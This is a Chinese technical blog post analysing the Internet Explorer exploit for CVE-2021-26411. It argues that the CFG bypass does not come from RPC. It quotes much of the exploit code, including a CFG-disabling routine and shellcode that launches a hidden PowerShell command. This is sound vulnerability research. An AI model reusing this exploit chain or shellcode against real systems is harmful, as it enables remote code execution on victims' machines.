纠正一下网上文章所说“利用RPC绕过CFG”的错误说法

已于 2023-03-03 22:31:43 修改
阅读量381 收藏
点赞数
分类专栏: 总结 漏洞复现与分析 文章标签: rpc 安全 网络协议
于 2022-11-29 15:51:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/128099617
版权

纠正误区

网上说“利用RPC绕过CFG”的说法是不正确的,我先给出自己的观点,后面再说我的分析。网上有好几篇分析CVE-2021-26411的文章,对绕过CFG一律都说是利用RPC。其实在这个漏洞场景下,攻击者只不过是借助RPC获得执行任意系统函数的功能(注意我这里说的是系统函数,因为系统函数必然是合法的地址。),如果是某个自己创建出来的堆栈地址则可能会触发CFG异常。以下是该漏洞POC的关键部分:

...
for (var i = 0; 16 > i; ++i) fakeArr[i] = bufArr[i];
fakeArr[4] = bs + 64, fakeArr[16] = vt, fakeArr[17] = gc, fakeArr[24] = 4294967295, setData(1, new Data(VT_DISPATCH, bs)), flush(), ref = new VBArray(hd0.nodeValue), god = new DataView(ref.getItem(1)), ref = null, pArr = read(read(pArr + 16, 32) + 20, 32) + 16, write(read(addrOf(hd0) + 24, 32) + 40, 0, 32);
var map = new Map,
    jscript9 = getBase(read(addrOf(map), 32)),
    rpcrt4 = getDllBase(jscript9, "rpcrt4.dll"),
    msvcrt = getDllBase(jscript9, "msvcrt.dll"),
    ntdll = getDllBase(msvcrt, "ntdll.dll"),
    kernelbase = getDllBase(msvcrt, "kernelbase.dll"),
    VirtualProtect = getProcAddr(kernelbase, "VirtualProtect"),
    LoadLibraryExA = getProcAddr(kernelbase, "LoadLibraryExA"),
    xyz = document.createAttribute("xyz"),
    paoi = addrOf(xyz),
    patt = read(addrOf(xyz) + 24, 32),
    osf_vft = aos(),
    msg = initRpc(),
    rpcFree = rpcFree();
    alert("killCfg");
killCfg(rpcrt4);
var shellcode = new Uint8Array([0xFC, 0xE8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xE5, 0x31, 0xC0, 0x64, 0x8B, 0x50, 0x30, 0x8B,
        0x52, 0x0C, 0x8B, 0x52, 0x14, 0x8B, 0x72, 0x28, 0x0F, 0xB7, 0x4A, 0x26, 0x31, 0xFF, 0xAC, 0x3C,
        0x61, 0x7C, 0x02, 0x2C, 0x20, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE2, 0xF2, 0x52, 0x57, 0x8B, 0x52,
        0x10, 0x8B, 0x4A, 0x3C, 0x8B, 0x4C, 0x11, 0x78, 0xE3, 0x48, 0x01, 0xD1, 0x51, 0x8B, 0x59, 0x20,
        0x01, 0xD3, 0x8B, 0x49, 0x18, 0xE3, 0x3A, 0x49, 0x8B, 0x34, 0x8B, 0x01, 0xD6, 0x31, 0xFF, 0xAC,
        0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0x38, 0xE0, 0x75, 0xF6, 0x03, 0x7D, 0xF8, 0x3B, 0x7D, 0x24, 0x75,
        0xE4, 0x58, 0x8B, 0x58, 0x24, 0x01, 0xD3, 0x66, 0x8B, 0x0C, 0x4B, 0x8B, 0x58, 0x1C, 0x01, 0xD3,
        0x8B, 0x04, 0x8B, 0x01, 0xD0, 0x89, 0x44, 0x24, 0x24, 0x5B, 0x5B, 0x61, 0x59, 0x5A, 0x51, 0xFF,
        0xE0, 0x5F, 0x5F, 0x5A, 0x8B, 0x12, 0xEB, 0x8D, 0x5D, 0x6A, 0x01, 0x8D, 0x85, 0xB2, 0x00, 0x00,
        0x00, 0x50, 0x68, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x68, 0xA6,
        0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47,
        0x13, 0x72, 0x6F, 0x6A, 0x00, 0x53, 0xFF, 0xD5, 0x6D, 0x73, 0x68, 0x74, 0x61, 0x20, 0x76, 0x62,
        0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x3A, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x6F, 0x62, 0x6A,
        0x65, 0x63, 0x74, 0x28, 0x22, 0x77, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x2E, 0x73, 0x68, 0x65,
        0x6C, 0x6C, 0x22, 0x29, 0x2E, 0x72, 0x75, 0x6E, 0x28, 0x22, 0x50, 0x6F, 0x77, 0x65, 0x72, 0x53,
        0x68, 0x65, 0x6C, 0x6C, 0x20, 0x2D, 0x6E, 0x6F, 0x70, 0x20, 0x2D, 0x65, 0x78, 0x65, 0x63, 0x20,
        0x62, 0x79, 0x70, 0x61, 0x73, 0x73, 0x20, 0x2D, 0x45, 0x6E, 0x63, 0x20, 0x74, 0x65, 0x73, 0x74,
        0x30, 0x29, 0x28, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x2E, 0x63, 0x6C, 0x6F, 0x73, 0x65, 0x29,
        0x00
    ]),
    msi = call2(LoadLibraryExA, [newStr("msi.dll"), 0, 1]) + 20480,
    tmpBuffer = createArrayBuffer(4);
	call2(VirtualProtect, [msi, shellcode.length, 4, tmpBuffer]);
	writeData(msi, shellcode);
	alert("protect shellcode");
	call2(VirtualProtect, [msi, shellcode.length, read(tmpBuffer, 32), tmpBuffer]);
    alert("call msi");
var result = call2(msi, []);
...

注意到 k i l l c f g \textcolor{cornflowerblue}{killcfg} killcfg函数,以下是它的实现:

function killCfg(e) {
    var t = new CFGObject(e);
    if (t.getCFGValue()) {
        var r = t.getCFGAddress(),
            a = getProcAddr(ntdll, "KiFastSystemCallRet"),
            n = createArrayBuffer(4);
        call2(VirtualProtect, [r, 4096, 64, n]), write(r, a, 32), call2(VirtualProtect, [r, 4096, read(n, 32), n]), map["delete"](n)
    }
}

function call2(e, t) {
    readyRpcCall(e);
    var r = setArgs(t);
    return call(msg), map["delete"](r), callRpcFreeBuffer()
}

function readyRpcCall(e) {
    var t = _RPC_MESSAGE.get(msg, "RpcInterfaceInformation"),
        r = PRPC_CLIENT_INTERFACE.get(t, "InterpreterInfo"),
        a = _MIDL_SERVER_INFO_.get(r, "DispatchTable");
    write(a, e, 32)
    alert('readyRpcCall():'.e);
}

它的思路是利用RPC调用VirtualProtect函数去修改 _ _ _ g u a r d _ c h e c k _ i c a l _ p t r \textcolor{cornflowerblue}{\_\_\_guard\_check\_ical\_ptr} ___guard_check_ical_ptr指针所在的内存属性位可读写,然后修改指针指向 K i F a s t S y s t e m C a l l R e t \textcolor{cornflowerblue}{KiFastSystemCallRet} KiFastSystemCallRet,达到绕过rpcrt4.dll中的CFG检测。做这一步的目的是为了后面会调用

 call2(msi, []);

msi是攻击者通过RPC调用LoadLibraryExA加载的msi.dll基址+20480,事实上这一步就算没有杀死CFG也是合法的,因为 L o a d L i b r a r y E x A \textcolor{cornflowerblue}{LoadLibraryExA} LoadLibraryExA是系统函数,在CFG中合法。然后攻击者将shellcode写入msi地址中,由于这个msi地址并不是某个系统函数的地址,所以必须在关闭CFG的情况下才能通过RPC调用,所以才有了前面的关闭CFG步骤。

而shellcode本身也没什么特别,就是做一些计算后拿到kernel32.dll中的 W i n E x e c \textcolor{cornflowerblue}{WinExec} WinExec然后进行调用。这在一开始直接利用RPC调用 W i n E x e c \textcolor{cornflowerblue}{WinExec} WinExec,不关闭CFG也是可以的,测试如图:

在这里插入图片描述

通过了CFG检测:

在这里插入图片描述

由此可见“利用RPC绕过CFG“的说法是不对的,根本没有关系!在重申一遍,这个漏洞中,只不过是利用RPC实现任意系统函数调用的功能。

网上的分析文章

[1] https://www.aqtd.com/nd.jsp?id=103
[2] https://paper.seebug.org/1579/
[3] https://zhuanlan.zhihu.com/p/376019202

飞鸿踏雪(蓝屏选手)
关注
专栏目录
基于ChakraJIT的CFG绕过技术
02-25
在本文中,我们将向读者介绍在攻击InternetExplorer和Edge浏览器时可用于绕过Microsoft的控制流防护(CFG)的方法。我们以前的概念验证性质的漏洞利用代码是通过覆盖对象的函数指针来实现的。但是,当遇到CFG时,这种...
db_user_cfg_cfg光猫_中信光猫_
10-02
【标题】"db_user_cfg_cfg光猫_中信光猫_" 暗示了这是一个与光猫配置相关的文件,其中可能包含了用户数据配置信息。"db_user_cfg.xml" 是压缩包内的文件名,通常XML文件是一种用于存储结构化数据的文件格式,常用于...
cfg-explorer:CFG二进制文件浏览器
05-05
cfg-explorer CFG Explorer是一个简单的实用程序,可用于浏览二进制程序的控制流程图。 它使用二进制分析框架进行CFG恢复,并在的帮助下将CFG渲染为 。 可以通过单击功能或呼叫站点节点来导航生成的SVG 。 此外,...
cfg.zip_cfg_cfg to parser
09-19
标题中的"cfg.zip_cfg_cfg to parser"表明这是一个关于配置文件解析的工具或库,它能够处理.zip格式的文件,其中包含以.cfg为扩展名的配置文件,并将其转换或解析为可读取的数据结构。这个工具可能被设计为易扩展且...
01Editor最新破解
热门推荐
qq_41252520的博客
12-30 1万+
注册的提示信息还有界面的提示信息很丰富,这为我们定位关键代码提供了充分的线索。此函数条件为真的分支存在多对1情况,导致逆函数不能保证得到正确的原函数输入,而原函数的输入在后面验证的时候还需要用到。因此,这个函数的逆函数没有意义。在满足条件3、6和7,就能确定hb中的所有元素,然后反求得serial。注意:这个函数是多对一的,所以这个函数的反函数就成了一对多。以上就是所有注册算法流程,接下来考虑如何获得正确的任意用户名的序列号。因为有处条件永不满足。,用来和序列号某个部分进行对比的,所以该函数也不用求逆。
WinDbg设置调试符号路径与调试符号下载(一篇就够)
qq_41252520的博客
02-23 9836
解决WinDbg设置符号路径,无法下载调试符号的问题
两道逆向题分析总结
qq_41252520的博客
03-31 5289
HWS2021——Enigma 前言 这是一道来自华为2021硬件安全冬令营线上赛的一道虚拟机逆向题,比较有特点的是整个虚拟机的操作隐藏在了异常处理函数中,正常用类似 OD调试器不能顺利调试。这种反调试结合虚拟机技巧值得学习。 分析工具:IDA 7.0 1.分析 1.1.整体流程 程序没有加壳,运行之后出现提示: 根据关键信息,来到主函数: int __cdecl main(int argc, const char **argv, const char **envp) { FILE *fout; //
Bitmap在Win7内核漏洞中的利用
qq_41252520的博客
03-17 4246
Windows7下利用Bitmap借助内核漏洞获取内核读写原语
父进程欺骗
qq_41252520的博客
04-25 2973
3.1.简介 父进程欺骗技术是说,把一个恶意进程的 PID指定为一个合法的进程(lsass.exe)的 PID。 安全软件会通过对父子进程间关系的检测来判断该进程是否异常,攻击者以此技术规避启发式检测等防御手段。 3.2.原理 父进程欺骗用的最多的方法就是通过CreateProcess\textcolor{cornflowerblue}{CreateProcess}CreateProcess函数实现,其原型如下: BOOL WINAPI CreateProcessA( _In_opt_ LPCS
第八届山东省网络安全技能大赛wp
qq_41252520的博客
09-25 2372
目录 Reverse 0x0 EasyApk 直接JEB加载: 主窗口代码如下 Encode类代码: 其实就是魔改的base64加密。其中函数base_1是将输入的字符串转成二进制流,函数base就是base64加密算法。首先判断数据是否为24的倍数,不是就在末尾补0,正好符合base加密的特征之一。然后将数据6个位划分为一组,循环查表,符合base加密的特征之二。然后就是字符替换...
CVE-2022-21882 分析&POC
qq_41252520的博客
04-29 2323
0x0 漏洞描述 该漏洞的成因和CVE-2021-1732类似,如果不了解,请先阅读我之前的分析:https://blog.csdn.net/qq_41252520/article/details/119349398 主要因为xxxClientAllocExtraBytesFunc\textcolor{cornflowerblue}{xxxClientAllocExtraBytesFunc}xxxClientAllocExtraBytesFunc函数会回调用户空间中的 user32!_xxxClientA
Tcache Stashing Unlink Attack 原理详解
qq_41252520的博客
08-06 1822
calloc\textcolor{cornflowerblue}{calloc}calloc函数是直接调用_int_malloc\textcolor{cornflowerblue}{\_int\_malloc}_int_malloc函数分配内存的,并且会清空内存 所以calloc\textcolor{cornflowerblue}{calloc}calloc可以越过 tcache取空闲内存。而malloc\textcolor{cornflowerblue}{malloc}malloc函数先是判断是否启用了
CVE-2021-40449 分析
qq_41252520的博客
03-24 1808
前言 该漏洞本身原理比较简单,而作为 Win10下的利用才是本篇文章的研究重点。 1.漏洞简介 1.1.漏洞描述 win32kfull.sys中的 NtGdiResetDC\textcolor{cornflowerblue}{NtGdiResetDC}NtGdiResetDC函数存在 UAF漏洞,攻击者可以利用该漏洞进行本地权限提升。 1.2.影响版本 windows_10 windows_10 20h2 windows_10 21h1 windows_10 1607 windows_10 1809 w
虎符CTF2020 部分题目复现(连续更新)
qq_41252520的博客
04-22 1771
PWN 0x0 MarksMan 【保护】: 【代码】: 很明显程序一开始就向我们泄露了libc的内存,如果通过检测,就可以任意地址写3个字节。如果能找到一处可控的调用,直接修改程one_gadget就可以了。 看看这个check检查了什么 这是过滤了部分字节,默认的one_gadget只能查看很少的可用地址,需要加上 -l参数,并指定一个较小的数字,如2,这样就能够得到更多可用地址。 现...
Largebin Attack原理详解
qq_41252520的博客
08-07 1628
攻击成效:能够向任意地址写堆地址,常配合其他攻击手法实现getshell。条件:能够修改Largebin−>bkLargebin−>bk。研究环境:Glibc2.31\textcolor{green}{研究环境:Glibc2.31}研究环境:Glibc2.31现在总结一下Largebin attack的一些利用条件和步骤。能够修改Largebin中的块的字段。程序中至少能够分配三种属于Largebin的不同大小的块。分配一块大小。...
2020ciscn 部分二进制WP(持续更新)
qq_41252520的博客
08-22 1410
逆向 0x0 z3 从名字来看,暗示了使用z3解决这道题。分析main函数可以看出是一个42元一次方程组。 最后在比较结果。 [脚本]: from z3 import* ans=[0x4f17,0x9cf6,0x8ddb,0x8ea6,0x6929,0x9911,0x40a2,0x2f3e,0x62b6,0x4b82,0x486c,0x4002,0x52d7,0x2def,0x28dc,0x640d,0x528f,0x613b,0x4781,0x6b17,0x3237,0x2a93,0
ETW HOOK原理探析
最新发布
qq_41252520的博客
11-11 1402
关于ETW是什么我就不多说了,可以通过微软的相关文档了解到。据网上得知这项技术最早被披露于2345的驱动中,一位工程师将其代码逆向还原之后大白于天下。随后各大安全厂商相继使用这种技术实现监控系统调用、内存页错误等。它是一个相对于VT来说更稳定,更简单的系统监控方式。调用ZwTraceControlZwTraceControl启用ETW日志(Win8只有NtTraceControlNtTraceControl。
House of pig 原理详解&实战
qq_41252520的博客
08-29 1312
该方法适用于glibc-2.31及其以上版本,基本原理是综合glibc-2.31下的、IO_FILE结构和这三种利用手法,常用于目标程序中使用calloccalloc代替mallocmalloc分配内存的情形下。该方法的核心在于glibc中的IO_str_overflowIO_str_overflow函数内会连续调用mallocmalloc、memcpymemcpy、...
CVE-2021-1732 分析
qq_41252520的博客
08-03 1239
文章目录CVE-2021-17320x0 漏洞描述0x1 受影响版本0x2 漏洞分析■ 环境■ 分析■ NtUserConsoleControl逆向分析■ xxxSetWindowLong逆向分析■ xxxSetWindowLongPtr逆向分析■ CreateWindowEx生成HWND分析■ CreateMenu逆向分析■ xxxGetMenuBarInfo逆向分析■ Win10 1909泄露内核■ 归纳几个重要的结构体及其偏移0x3 漏洞利用1.获取需要用到的函数地址2.HOOK目标函数3.精心构造3
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值